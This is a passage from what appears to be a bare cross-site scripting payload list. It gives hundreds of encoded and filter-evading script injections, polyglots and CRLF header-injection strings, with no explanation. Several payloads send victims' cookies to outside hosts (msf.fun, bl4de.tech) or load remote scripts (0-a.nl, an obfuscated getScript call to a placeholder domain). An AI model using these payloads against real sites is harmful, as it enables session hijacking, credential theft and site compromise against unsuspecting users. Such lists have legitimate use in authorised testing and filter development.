5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%28%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%5D%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%29%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%29%28%29%28%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%2B%5B%2B%21%2B%5B%5D%5D%2B%28%5B%2B%5B%5D%5D%2B%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%29
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<<SCRIPT>alert("XSS");//\<</SCRIPT>
<IMG SRC="`<javascript:alert>`('XSS')"
</script><script>alert('XSS');</script>
'"><A HRef=" AutoFocus OnFocus=top/**/?.'ale'%2B'rt'>"
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<svg/onload=alert('XSS')>
&quot;&gt;&lt;svg onload=alert&amp;amp;#x00000040&quot;1&quot;&gt;
&lt;svg onload=&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116(1)&gt;
&lt;svg/onload=&#39;alert&amp;#40 23 &amp;#41;&#39;&gt;
&quot;&gt;&lt;svg onload=alert&amp;#x2F;&#x00000040&quot;1&quot;&gt;
&quot;&gt;&lt;svg onload=alert&amp;amp;#x27;&#x00000040&quot;1&quot;&gt;
&rdquo;&gt;&lt;svg onload=alert&amp;#000000040&quot;1&quot;&gt;
&quot;&gt;&lt;svg onload=alert&amp;#x27;&#x00000040&quot;1&quot;&gt;
&quot;&gt;&lt;SVG ONLOAD=&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116(&amp;#x64&amp;#x6f&amp;#x63&amp;#x75&amp;#x6d&amp;#x65&amp;#x6e&amp;#x74&amp;#x2e&amp;#x64&amp;#x6f&amp;#x6d&amp;#x61&amp;#x69&amp;#x6e)&gt;
&quot;&gt;&lt;svg onload=alert&amp;#x27;&#x00000040&quot;1&quot;&gt;
PHN2ZyBvbmxvYWQ9YWxlcnQmYWxlcnQoMjMgKT4=
PHN2Zy9vbmxvYWQ9J2FsZXJ0Jz4=
%22%3E%3Csvg%20onload%3Dalert%26amp%3B%26amp%3B%23x00000040%221%22%29%3E
%3Csvg%20onload%3D%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%28%26%231%3B%29%3E
%3Csvg%2Fonload%3D'alert%26%2340%2023%20%26%2341'%3E
<BGSOUND SRC="javascript:alert('XSS');">
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;
<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div">
<img/src/onerror="(function(x){this[x+`ert`](1)})`al`">
<img/src/onerror="window[ al+/e/['ex + ec]'e'+'rt'](2)">
<svg/&parameter=onload=alert()>
<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a">
<audio autoplay onloadstart=this.src='hxxps://msf.fun/?c='+document["cook"+"ie"]' src=x>
<"><details/open/ontoggle="jAvAsCrIpT&colon;alert&lpar;/xss-by-tarun/&rpar;">XXXXX</a>
<svg/onload=self[`aler`%2b`t`]`1`>
%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E
>><marquee loop=1 width=0 onfinish=alert(1)>
<a href=&#01javascript:alert(1)>
<a href=javascript&colon;confirm(1)>
<a href="jav%0Dascript&colon;alert(1)">
<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme
tarun"><x/onafterscriptexecute=confirm%26lpar;)//
<a/href=%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x0a;:alert(1)>please%20click%20here</a>
%uff1cscript%uff1ealert(‘XSS’);%uff1c/script%uff1e
<%tag onmouseover="alert('markitzeroday.com')">
%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e
%uff3c%uff73%uff6cr%uff69%uff63%uff74%uffe0alert('XSS')%uff3e
%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u003ealert('XSS')%u003c%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003e
%uff3c%uff73%uff63%uff72%uff69%uff70%uff74%uff3ealert('XSS')%uff3c%uff2f%uff73%uff63%uff72%uff69%uff70%uff74%uff3e
%uff3cscript%uff3ealert('XSS')%uff3c/script%uff3e
%3Cscript%3Ealert('XSS')%3C/script%3E
%u003Cscript%u003Ealert('XSS')%u003C/script%u003E
%253Cscript%253Ealert('XSS')%253C/script%253E
%uff3c%uff73%uff63%uff72%uff69%uff70%uff74%uffe0alert('XSS')%uff3e
%u0025u0073u0063u0072u0069u0070u0074u003Ealert('XSS')%u003C%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003E
&lt;script&gt;alert('XSS')&lt;/script&gt;
%25253Cscript%25253Ealert('XSS')%25253C%252Fscript%25253E
<svg/onload='+/"`/+/onmouseover=1/+/[*/[]/+alert(42);//'>
\<a onmouseover=alert(document.cookie)\>xxs link\</a\>
<IMG SRC=# onmouseover="alert('xxs')">
%3B%C3%81=![]%3B%C3%89=!![]%3B%C3%8D=[][[]]%3B%C3%93=%2B[![]]%3BSI=%2B(%2B!%2B[]%2B(!%2B[]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B[%2B!%2B[]]%2B[%2B[]]%2B[%2B[]]%2B[%2B[]])%3BST=([]%2B[])%3B%C3%9C=(%2B[])%3BA=(%C3%81%2B%22%22)[1]%3BD%20=%20(%C3%8D%2B%22%22)[2]%3BE%20=%20(%C3%89%2B%22%22)[3]%3BF%20=%20(%C3%81%2B%22%22)[0]%3BG%20=%20[![]%2B[%2B[]]%2B[[]%2B[]][%2B[]][[![]%2B%7B%7D][%2B[]][%2B!%2B[]%2B[%2B[]]]%2B[[]%2B%7B%7D][%2B[]][%2B!%2B[]]%2B[[][[]]%2B[]][%2B[]][%2B!%2B[]]%2B[![]%2B[]][%2B[]][!%2B[]%2B!%2B[]%2B!%2B[]]%2B[!![]%2B[]][%2B[]][%2B[]]%2B[!![]%2B[]][%2B[]][%2B!%2B[]]%2B[[][[]]%2B[]][%2B[]][%2B[]]%2B[![]%2B%7B%7D][%2B[]][%2B!%2B[]%2B[%2B[]]]%2B[!![]%2B[]][%2B[]][%2B[]]%2B[[]%2B%7B%7D][%2B[]][%2B!%2B[]]%2B[!![]%2B[]][%2B[]][%2B!%2B[]]]][%2B[]][!%2B[]%2B!%2B[]%2B[%2B[]]]%3BI%20=%20([%C3%81]%2B%C3%8D)[10]%3BL%20=%20(%C3%81%2B%22%22)[2]%3BT%20=%20(%C3%89%2B%22%22)[0]%3BO%20=%20(%C3%89%2B[][F%2BI%2BL%2BL])[10]%3BR%20=%20(%C3%89%2B%22%22)[1]%3BN%20=%20(%C3%8D%2B%22%22)[1]%3BM%20=%20(%2B(208))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](31)[1]%3BP%20=%20(%2B(211))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](31)[1]%3BS%20=%20(%C3%81%2B%22%22)[3]%3BU%20=%20(%C3%8D%2B%22%22)[0]%3BV%20=%20(%2B(31))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](32)%3BX%20=%20(%2B(101))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](34)[1]%3BY%20=%20(%C3%93%2B[SI])[10]%3BZ%20=%20(%2B(35))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](36)%3BC%20=%20([][F%2BI%2BL%2BL]%2B%22%22)[3]%3BH%20=%20(%2B(101))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](21)[1]%3BK%20=%20(%2B(20))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](21)%3BW%20=%20(%2B(32))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](33)%3BJ%20=%20([][E%2BN%2BT%2BR%2BI%2BE%2BS]()%2B%22%22)[3]%3BB%20=%20([][E%2BN%2BT%2BR%2BI%2BE%2BS]()%2B%22%22)[2]%3BDOT%20=%20(%2B(%2211E100%22)%2B[])[1]%3BSLA=(![]%2B[%2B![]])[([![]]%2B[][[]])[%2B!%2B[]%2B[%2B[]]]%2B(!![]%2B[])[%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B([![]]%2B[][[]])[%2B!%2B[]%2B[%2B[]]]%2B([][(![]%2B[])[%2B[]]%2B([![]]%2B[][[]])[%2B!%2B[]%2B[%2B[]]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(!![]%2B[])[%2B[]]%2B(!![]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(!![]%2B[])[%2B!%2B[]]]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]]()[%2B!%2B[]%2B[%2B[]]]%3B[][F%2BI%2BL%2BL][C%2BO%2BN%2BS%2BT%2BR%2BU%2BC%2BT%2BO%2BR](S%2BE%2BT%2B%22T%22%2BI%2BM%2BE%2BO%2BU%2BT%2B%22(%22%2BF%2BU%2BN%2BC%2BT%2BI%2BO%2BN%2B%22()%7B%20$%22%2BDOT%2BG%2BE%2BT%2B%22S%22%2BC%2BR%2BI%2BP%2BT%2B%22('%22%2BSLA%2BSLA%2B%22BADASSDOMAIN%22%2BDOT%2B%22COM%22%2BSLA%2B%22BADASSURL')()%3B%20%7D,%203000)%3B%22)()%3B(%22
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
><img/onerror="javascript:alert(1%26%23x000000029;" src=x>
"><iframe/src="javascript:alert(1%26%23x00000000000000000000000000029;"></iframe>
window['alXert'.replace(/X/, '')](self['document']['cookie'])
#prettyPhoto%3Cimg%20src=x%20onerror=prompt(document.cookie)%3E;//
?&q&zzz%27onmou%3Cseover=1&ale%3Crt(%27xsp%27%3C)%3C%3B1%3B%20//
zzz%27onmou%3Cseover=1&ale%3Crt(%27xsp%27%3C)%3C%3B1%3B%20//
<img/src=a onerror="window['alert'](document.cookie)"/>
<script src=//0-a.nl/conf.js></script>
<iframe src="javascript:alert('XSS')"></iframe>
<input type="text" value="javascript:alert('XSS')">
<form action="javascript:alert('XSS')">
"><script>alert(1)</script><"
javascript:/*'-alert(1)-'*/
javascript:document.body.onclick=alert(1)
123456%22/%3E%3Cmath%3E%3Carchy%20href=Ja%26Tab;vascript%26colon;console.error(1)%3EARCHY%3C/archy%3E%3C/math%3E%3C!--
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
javascript:var img=document.createElement('img');img.src='';document.body.appendChild(img);img.onerror=alert(1)
javascript:var a=document.createElement('a');a.href='javascript:alert(1)';document.body.appendChild(a)
<script>alert('\u0031')</script>
&#x3C;script&#x3E;alert(1)&#x3C;&#x2F;script&#x3E;
" onfocus="alert(1)" autofocus="
<audio src="nonexistent.mp3" onerror="alert(1)"></audio>
?query=<img/src/onerror=alert(`ibro`)>
?query="><img src=x onerror=prompt(document.domain);>
en-us/Search#/?search="><img src=x onerror=prompt(document.domain);>
search?q=<img/src/onerror=alert(`ibro`)>
Search/Results?q=<img/src/onerror=alert(`ibro`)>
Search/Results?q="><img src=x onerror=prompt(document.domain);>
redirect?url=javascript://%250Aalert(document.domain)
redirect.asp?url=javascript://%250Aalert(document.domain)
redirect.aspx?url=javascript://%250Aalert(document.domain)
q=javascript:alert(document.domain)
guest/msft_a_guest_register.php?_browser=1&title="><svg/onload=alert(1)>
(A("onerror='alert`1`'testabcd))/
onerror="alert('XSS')"
pods/ppt.aspx?&fileName=')}, 1000); alert('xss')://
')}, 1000); alert('xss')://
<!--xss"><img src=x onerror=prompt(document.domain)>-->
%253Cimg%2520src%253Dx%2520onerror%253Dalert%2528%2529%253E
'; x=eval; </script> <svg onpointerenter=alert()%20z= alert >
mrco24"type=image src onerror="alert(1)"
"><script akdk> prompt(document.domain)</script akdk>
foo?q=foo<script>alert('xss')<%2fscript>
Login.aspx?username=<img/src/onerror=alert(ibro)>
<details open ontoggle="alert(1)"><summary>Click me!</summary></details>
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<img src="javascript:alert('XSS')" alt="Image">
<Img Src=OnXSS OnError=confirm(document.cookie)>
tagName%2BinnerHTML%2Blocation.hash%3E/*click%20me!#*/alert(document.domain)
xxxxxxxxx'});});</script><script>prompt("PLEASE%20\nSUBSCRIBE")</script>
xxxxxxxxx'});}); </script><script>prompt ("PLEASE%20\nSUBSCRIBE") </script>
<img src=x onerror=print()>
javascript://'/</title></style></textarea></script>--><p%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B'%22%2F%2F%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+'Audi%20RS5'.substr(0,4)}}XXX%3Cscript%3Ealert('XSS')
javascript://%2F%2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscript%3E--%3E%3Cp%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B%27%22%2F%2F%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+'Audi%20RS5'.substr(0,4)}}XXX%3Cscript%3Ealert('XSS')
javascript://%2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscript%3E--%3E%3Cp%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B'%22%2F%2F%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+'Audi%20RS5'.substr(0,4)}}XXX%3Cscript%3Ealert('XSS')
#jaVasCript:/*-/*/*\/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e
`javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>/alert()/
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'
#jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e
javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>*/alert()/*<img src=x onerror=alert(456)/><svg/onload=prompt(789)/>;'"// :;fn();%0a%0d\n\r\t{{12*12+'Audi RS5'.substr(0,4)}}XXX<script>alert('XSS')
javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>*/alert()/*
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
javascript:/*/*/**/**/**/*%0D%0A%0d%0a*//**/oNclick-alert())//</style/</title/</textarEa/</script/->\x3ciframe/<iframe/oNloAd-alert(1)//>\x3e
javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>*/alert()/*<img src=x onerror=alert(456)/><svg/onload=prompt(789)/>;'"// :;fn();%0a%0d\n\r\t{{12*12+'Audi RS5'.substr(0,4)}}XXX<script>alert('XSS')<img src=x onerror='(function s(){var i=new Image();i.src='http://bl4de.tech/bxss.php?c='+document.cookie+';'+encodeURIComponent(location.href);document.body.append(i)})()'/>#jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e
"onmouseover="alert(1)
"onmouseover=alert(1)
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE
%E5%98%8D%E5%98%8ASet-Cookie%3A%20whoami%3Dthecyberneh%25u2028%25u2029XSS-Payload%3A%2520%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%0D%0A%0D%0A%3Cscript%3E%0D%0A%20alert(1);%0D%0A%3C/script%3E%0D%0A
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE%0D%0A%0D%0A<script>%0D%0Aalert(1);%0D%0A</script>
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0d%0a%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%0d%0aX-XSS-Protection:0%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--
%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
<a"/onclick=(confirm)()>elcezeri!
"><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">
<svg onload=alert(document.domain)>
xss"><!--><svg/onload=alert(document.domain)>
"><A%20%252F=""Href=%20JavaScript:k=%27a%27,top[k%2B%27lert%27](origin)>
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
%3Cimg src='null' onerror=alert('spyerror')%3E
<s\Cr\ipt\>alert(document\.cookie)<\/s\Cr\ipt\>\;\/>
<details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain)
<object/data="javascript&colon;alert/**/(document.domain)">//
<iframe src="javasc%0a%0dript:alert(0);">
%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(%22XSS%22)%3E
&quot;&gt;&lt;img src=x onerror=prompt(&quot;XSS&quot;)&gt;
"\">" + "<img src=x onerror=prompt('XSS')>" + "\""
"><img&#x20;src=x&#x20;onerror=prompt('XSS')>"
"><body/onload="{x:onerror=alert};x"
%3csvg/onload=window%5b%22al%22+%22ert%22%5d1337`%3e
"><img src=x onerrora=confirm() onerror=confirm(1)>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
#"onmouseover="alert(1)
#javascript:alert(1)
javascript:alert(1)
"'><img src=q onerror=alert(1)>
<img/ignored=()%0Asrc=x%0Aonerror=prompt(1)>
'-setTimeout`prompt\u0028document.domain\u0029`-'
}}}</script><script>alert(1)</script>
alert?.(document?.cookie)
<--`<img/src=`%20onerror=confirm``>%20--!>
{{&lt;svg/onload=prompt(&quot;XSS&quot;)&gt; }}
javascript:alert(1)?q=%26callback%3Durc_button.click%23
#&quot;-alert(1)}//
test+(<script>alert(0)</script>)@gmail.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@gmail.com
#&#39;-alert(1)-&#39;
&#39;-alert(1)-&#39;
themecolor=%22-alert('XSS')-%22
<IFRAME SRC="javascript:alert(document.cookie);"></iframe>'
<details open id="' &quot;'"ontoggle=alert(1)>
%22-alert('XSS')-%22
#&lt;img&#47;src&#47;onerror=alert(`ibro`)&gt;
#&lt;script&gt;prompt(document.domain)&lt;&#47;script&gt;
JavaScript://%250Dtop.confirm?.(1)//
#"><img src=x onerror=prompt(document.domain);>
1')"<!--><Svg OnLoad=(confirm)(1)<!--
amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=
<script>prompt(document.domain)</script>
#<script>prompt(document.domain)</script>
-->""/></script><deTailS open x=">" ontoggle=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
<script x>alert('XSS')<script y>
<script>onerror=alert;throw 1337</script>
<object onafterscriptexecute=confirm(0)>
xyz';"/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)>
<img/src='1'/onerror=alert(0)>
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
<svg onload = alert(1) >
"><svg/onload=confirm(1)>"@x.y
<img/src/onerror=alert(`ibro`)>
<svg onload=alert%26%230000000040"")>
#<img/src/onerror=alert(`ibro`)>
'-alert(1)-'
#'-alert(1)-'
#\"-alert(1)}//
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
>"'><script>alert(2);</script>
>'"><script>alert(2);</script>
+alert(1)+
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
>'><script>alert(2);</script>
>'"><img src=x onerror=script(2);>
& lt;script&gt;alert(2);& lt;/script&gt;
& apos;><script>alert(2);</script>
!');script(2);//
$("script(2)")
[[constructor.constructor('alert(document.cookie)')()]]
['script'](2)
123')});alert(1);(()=>{('
&#x27;&lt;script&gt;alert(1)&lt;/script&gt;&#x27;
&#x27;javascript:alert(2)&#x27;
#x27;&lt;img src=1 onerror=alert(1)&gt;&#x27;
&#x27;&quot;&lt;img src=1 onerror=alert(1)&gt;&quot;&#x27;
&#x27;&quot;&gt;&lt;img src=x onerror=prompt(document['domain']);&gt;&#x27;
" /> <script>alert('XSS Testing");</script>
');alert(1)//
<math><x xlink:href=javascript:confirm`1`>click
" accesskey='x' onclick='confirm`1`' //
<x/oncopy=alert()>x
a=8,b=confirm,c=window,c.onerror=b;throw-a
<?tag x="-->" test="<img src=x onerror=alert(1)//">
<java contentEditable='' autofocus='' onfocus=location=tagName+innerHTML+location.hash>script:/*#*/alert(1)
new Function`a\l\ert\`1\``
url=%26%2302java%26%23115cript:alert(document.domain)
?url=%26%2302java%26%23115cript:alert(document.domain)
`'";//><img/src=x onError="${x};alert(`1`);">
`'";//><Img Src=a OnError=location=src>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
</script><script>confirm(document.cookie)</script>
<sCriPt>confirm(documen.cookie)</ScRipt>
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
')}, 1000);alert("xss");//
1'"();<test><ScRiPt>window.alert("XSS_WAF_BYPASS")</ScRiPt>
